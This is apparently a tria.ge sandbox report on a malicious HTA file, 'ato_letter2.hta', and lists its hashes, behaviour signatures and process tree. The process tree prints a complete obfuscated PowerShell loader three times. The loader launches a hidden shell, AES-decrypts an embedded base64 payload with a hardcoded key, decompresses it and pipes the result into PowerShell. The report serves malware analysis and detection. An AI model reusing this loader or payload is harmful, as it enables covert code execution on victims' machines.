Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

21/01/2025, 13:39

250121-qx27kswrck 10

21/01/2025, 11:57

250121-n4kvrsskfv 10

21/01/2025, 11:43

250121-nvpglaslfq 10

21/01/2025, 11:26

250121-njtbea1qcp 10

Analysis

  • max time kernel
    15s
  • max time network
    21s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    21/01/2025, 11:26

General

  • Target

    163.5.169.28/ato_letter2.hta

  • Size

    1.1MB

  • MD5

    54ff1471d93aa84c94efd8cbae4c6c78

  • SHA1

    11c7d8cd8e02b27aee846c353c32b114a7daa3bf

  • SHA256

    e1869d3a88c9190cf43014e3cb48562fc220ff7f6d5baed77c7dfa1c84c5d530

  • SHA512

    5eed6c7f0ffc27e96349fa8fc7c959e87ff35561da2b811f2e59c0fa0bd42f53debd4079da4c1df133b8211c38ef48f03b3f8b5471370bcf6ed79d240fdde804

  • SSDEEP

    1536:SwxapK31kELNEZ1fos0mr/l1vcmafSIm+lIWFR9UU5gou0gQixFaVEYkEOvMXu+f:SOapK31RBEDws7g

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\163.5.169.28\ato_letter2.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:1688
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $HeikUII = 'AAAAAAAAAAAAAAAAAAAAAJUqOuW4KC6NBAvMfuqK6bp8mGb6bLm9fWAzjp5jn2QEw1DPIAEVLR/tM1tCOABSJYRJIHsHR+nwBtm/eM3I4TTMXEl/ET9CnIbNyvlt9/LNK1ip+uHxXawFKuZDcM0aZtYYe0NhVAm2cqLZRezYxIP823MoH345L2oPsU/6qv3e6g7/iM9o/BVj0e6LhtUV/LwvA2y8SMIyzvW6Rj9MOWuoo5XUYhYSSit4x9Hpn6LHbZBbpW4rMdUxi3ATLDlKoEf0ZlThOxM9di4jM96Tov2ZVqD3Z25V2DxXbkgCdfuHSu7Tooif4YOU9/3JOuRksBwJWYcJ/JFWZAw6/jelCh7i3M6i6V4QSX+fbsJ8CEawMAVCsEHorjcl+DUqZ9Lzsanb3FtB0GJhJUPhvNBZSS9QpBdKbuQnOWC0BBbJIzCRtxKiM26p2m2M/k+QoZIMMSuhVkj5rfIzRuWIdrFxftSMHly9ShtWAqvLz3oX/BuQShbNWHUUe+/N9jMmQeNa6pVq4Y8EfDBgMfrIdsEOu70AWm4FX3LyK5ybwUXhVrgjuPTzSiaZtFFWGtseCLOv5b4HDcOwji4TJjO7BSqcmfz5gk4hzX2m3Gc4iafh9JfgLdkI2OFBKGZ3nngRvgzwPXYBIhqYS+r6NJWTRnREQ2FLRd38VmAa5arOcvP7IF4DG/ofVajmN9oIRJfWm4z0LW7xZJ27y6hZy5Ol7xPcumURWTr9iCTw9Rgb6lWAwkimXI4qGUIYjctFodN9qoPSsic/NCPDFyhKu9epCQ9nl4QVCzvxfSGvM7KllLg3Plv0QdDTJbWOQufrtzK51hDZR2Mz5UqPKtOqYIj+lnQfkLgdetwhGRtXY8fRTn9IxEleTtaYsMHls8d5tF0ZcH1Qgi1HHUXiBV8Lt4uHmZdsQoGMO7ZrToHgDEVe7QlOKRPvsEfjhObpc7ozW7iRXL6kUAXUIj8zbeCrj5evGSp4ELA8XoFZ9lCBQv7XVk/2HqhP/lDfU+MXM5hzNUj9ugx06eJBK4Fh4r2yMpj43uG5Om4=';$JNqAj = 'TG9HTmhqa2hYUWhoRHdiSVRNZm1kekxRRGVVam1uVVY=';$lYZTTWkh = New-Object 'System.Security.Cryptography.AesManaged';$lYZTTWkh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$lYZTTWkh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$lYZTTWkh.BlockSize = 128;$lYZTTWkh.KeySize = 256;$lYZTTWkh.Key = [System.Convert]::FromBase64String($JNqAj);$zlRIi = [System.Convert]::FromBase64String($HeikUII);$HyakcEgs = $zlRIi[0..15];$lYZTTWkh.IV = $HyakcEgs;$lfJyAqixo = $lYZTTWkh.CreateDecryptor();$JvbLhIVwZ = $lfJyAqixo.TransformFinalBlock($zlRIi, 16, $zlRIi.Length - 16);$lYZTTWkh.Dispose();$JExI = New-Object System.IO.MemoryStream( , $JvbLhIVwZ );$PcPXihBj = New-Object System.IO.MemoryStream;$HbjrfOhba = New-Object System.IO.Compression.GzipStream $JExI, ([IO.Compression.CompressionMode]::Decompress);$HbjrfOhba.CopyTo( $PcPXihBj );$HbjrfOhba.Close();$JExI.Close();[byte[]] $vpbeKa = $PcPXihBj.ToArray();$JVZpEn = [System.Text.Encoding]::UTF8.GetString($vpbeKa);$JVZpEn | powershell - }
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1376
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c powershell.exe $HeikUII = 'AAAAAAAAAAAAAAAAAAAAAJUqOuW4KC6NBAvMfuqK6bp8mGb6bLm9fWAzjp5jn2QEw1DPIAEVLR/tM1tCOABSJYRJIHsHR+nwBtm/eM3I4TTMXEl/ET9CnIbNyvlt9/LNK1ip+uHxXawFKuZDcM0aZtYYe0NhVAm2cqLZRezYxIP823MoH345L2oPsU/6qv3e6g7/iM9o/BVj0e6LhtUV/LwvA2y8SMIyzvW6Rj9MOWuoo5XUYhYSSit4x9Hpn6LHbZBbpW4rMdUxi3ATLDlKoEf0ZlThOxM9di4jM96Tov2ZVqD3Z25V2DxXbkgCdfuHSu7Tooif4YOU9/3JOuRksBwJWYcJ/JFWZAw6/jelCh7i3M6i6V4QSX+fbsJ8CEawMAVCsEHorjcl+DUqZ9Lzsanb3FtB0GJhJUPhvNBZSS9QpBdKbuQnOWC0BBbJIzCRtxKiM26p2m2M/k+QoZIMMSuhVkj5rfIzRuWIdrFxftSMHly9ShtWAqvLz3oX/BuQShbNWHUUe+/N9jMmQeNa6pVq4Y8EfDBgMfrIdsEOu70AWm4FX3LyK5ybwUXhVrgjuPTzSiaZtFFWGtseCLOv5b4HDcOwji4TJjO7BSqcmfz5gk4hzX2m3Gc4iafh9JfgLdkI2OFBKGZ3nngRvgzwPXYBIhqYS+r6NJWTRnREQ2FLRd38VmAa5arOcvP7IF4DG/ofVajmN9oIRJfWm4z0LW7xZJ27y6hZy5Ol7xPcumURWTr9iCTw9Rgb6lWAwkimXI4qGUIYjctFodN9qoPSsic/NCPDFyhKu9epCQ9nl4QVCzvxfSGvM7KllLg3Plv0QdDTJbWOQufrtzK51hDZR2Mz5UqPKtOqYIj+lnQfkLgdetwhGRtXY8fRTn9IxEleTtaYsMHls8d5tF0ZcH1Qgi1HHUXiBV8Lt4uHmZdsQoGMO7ZrToHgDEVe7QlOKRPvsEfjhObpc7ozW7iRXL6kUAXUIj8zbeCrj5evGSp4ELA8XoFZ9lCBQv7XVk/2HqhP/lDfU+MXM5hzNUj9ugx06eJBK4Fh4r2yMpj43uG5Om4=';$JNqAj = 'TG9HTmhqa2hYUWhoRHdiSVRNZm1kekxRRGVVam1uVVY=';$lYZTTWkh = New-Object 'System.Security.Cryptography.AesManaged';$lYZTTWkh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$lYZTTWkh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$lYZTTWkh.BlockSize = 128;$lYZTTWkh.KeySize = 256;$lYZTTWkh.Key = [System.Convert]::FromBase64String($JNqAj);$zlRIi = [System.Convert]::FromBase64String($HeikUII);$HyakcEgs = $zlRIi[0..15];$lYZTTWkh.IV = $HyakcEgs;$lfJyAqixo = $lYZTTWkh.CreateDecryptor();$JvbLhIVwZ = $lfJyAqixo.TransformFinalBlock($zlRIi, 16, $zlRIi.Length - 16);$lYZTTWkh.Dispose();$JExI = New-Object System.IO.MemoryStream( , $JvbLhIVwZ );$PcPXihBj = New-Object System.IO.MemoryStream;$HbjrfOhba = New-Object System.IO.Compression.GzipStream $JExI, ([IO.Compression.CompressionMode]::Decompress);$HbjrfOhba.CopyTo( $PcPXihBj );$HbjrfOhba.Close();$JExI.Close();[byte[]] $vpbeKa = $PcPXihBj.ToArray();$JVZpEn = [System.Text.Encoding]::UTF8.GetString($vpbeKa);$JVZpEn | powershell -
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2836
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe $HeikUII = 'AAAAAAAAAAAAAAAAAAAAAJUqOuW4KC6NBAvMfuqK6bp8mGb6bLm9fWAzjp5jn2QEw1DPIAEVLR/tM1tCOABSJYRJIHsHR+nwBtm/eM3I4TTMXEl/ET9CnIbNyvlt9/LNK1ip+uHxXawFKuZDcM0aZtYYe0NhVAm2cqLZRezYxIP823MoH345L2oPsU/6qv3e6g7/iM9o/BVj0e6LhtUV/LwvA2y8SMIyzvW6Rj9MOWuoo5XUYhYSSit4x9Hpn6LHbZBbpW4rMdUxi3ATLDlKoEf0ZlThOxM9di4jM96Tov2ZVqD3Z25V2DxXbkgCdfuHSu7Tooif4YOU9/3JOuRksBwJWYcJ/JFWZAw6/jelCh7i3M6i6V4QSX+fbsJ8CEawMAVCsEHorjcl+DUqZ9Lzsanb3FtB0GJhJUPhvNBZSS9QpBdKbuQnOWC0BBbJIzCRtxKiM26p2m2M/k+QoZIMMSuhVkj5rfIzRuWIdrFxftSMHly9ShtWAqvLz3oX/BuQShbNWHUUe+/N9jMmQeNa6pVq4Y8EfDBgMfrIdsEOu70AWm4FX3LyK5ybwUXhVrgjuPTzSiaZtFFWGtseCLOv5b4HDcOwji4TJjO7BSqcmfz5gk4hzX2m3Gc4iafh9JfgLdkI2OFBKGZ3nngRvgzwPXYBIhqYS+r6NJWTRnREQ2FLRd38VmAa5arOcvP7IF4DG/ofVajmN9oIRJfWm4z0LW7xZJ27y6hZy5Ol7xPcumURWTr9iCTw9Rgb6lWAwkimXI4qGUIYjctFodN9qoPSsic/NCPDFyhKu9epCQ9nl4QVCzvxfSGvM7KllLg3Plv0QdDTJbWOQufrtzK51hDZR2Mz5UqPKtOqYIj+lnQfkLgdetwhGRtXY8fRTn9IxEleTtaYsMHls8d5tF0ZcH1Qgi1HHUXiBV8Lt4uHmZdsQoGMO7ZrToHgDEVe7QlOKRPvsEfjhObpc7ozW7iRXL6kUAXUIj8zbeCrj5evGSp4ELA8XoFZ9lCBQv7XVk/2HqhP/lDfU+MXM5hzNUj9ugx06eJBK4Fh4r2yMpj43uG5Om4=';$JNqAj = 'TG9HTmhqa2hYUWhoRHdiSVRNZm1kekxRRGVVam1uVVY=';$lYZTTWkh = New-Object 'System.Security.Cryptography.AesManaged';$lYZTTWkh.Mode = [System.Security.Cryptography.CipherMode]::ECB;$lYZTTWkh.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$lYZTTWkh.BlockSize = 128;$lYZTTWkh.KeySize = 256;$lYZTTWkh.Key = [System.Convert]::FromBase64String($JNqAj);$zlRIi = [System.Convert]::FromBase64String($HeikUII);$HyakcEgs = $zlRIi[0..15];$lYZTTWkh.IV = $HyakcEgs;$lfJyAqixo = $lYZTTWkh.CreateDecryptor();$JvbLhIVwZ = $lfJyAqixo.TransformFinalBlock($zlRIi, 16, $zlRIi.Length - 16);$lYZTTWkh.Dispose();$JExI = New-Object System.IO.MemoryStream( , $JvbLhIVwZ );$PcPXihBj = New-Object System.IO.MemoryStream;$HbjrfOhba = New-Object System.IO.Compression.GzipStream $JExI, ([IO.Compression.CompressionMode]::Decompress);$HbjrfOhba.CopyTo( $PcPXihBj );$HbjrfOhba.Close();$JExI.Close();[byte[]] $vpbeKa = $PcPXihBj.ToArray();$JVZpEn = [System.Text.Encoding]::UTF8.GetString($vpbeKa);$JVZpEn
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3036
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2792

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    43aab94d040336c784d4dc4ef5e03109

    SHA1

    f0e56908ac43b7cbc24b991c54b351f1f7d55341

    SHA256

    b29f8cb9e863465b517f94ef70fb0cad8582019911aee98fe7afae3dd2192a9f

    SHA512

    820138fda13b9baa130b9c1609a86d39d8193760f208283f6290c5dd9e72d594a54cfafa949e8d9e65ea77211ee1e80c4544789ac4a179ef1f5f2428e5e92197

  • memory/1376-2-0x0000000002920000-0x0000000002960000-memory.dmp

    Filesize

    256KB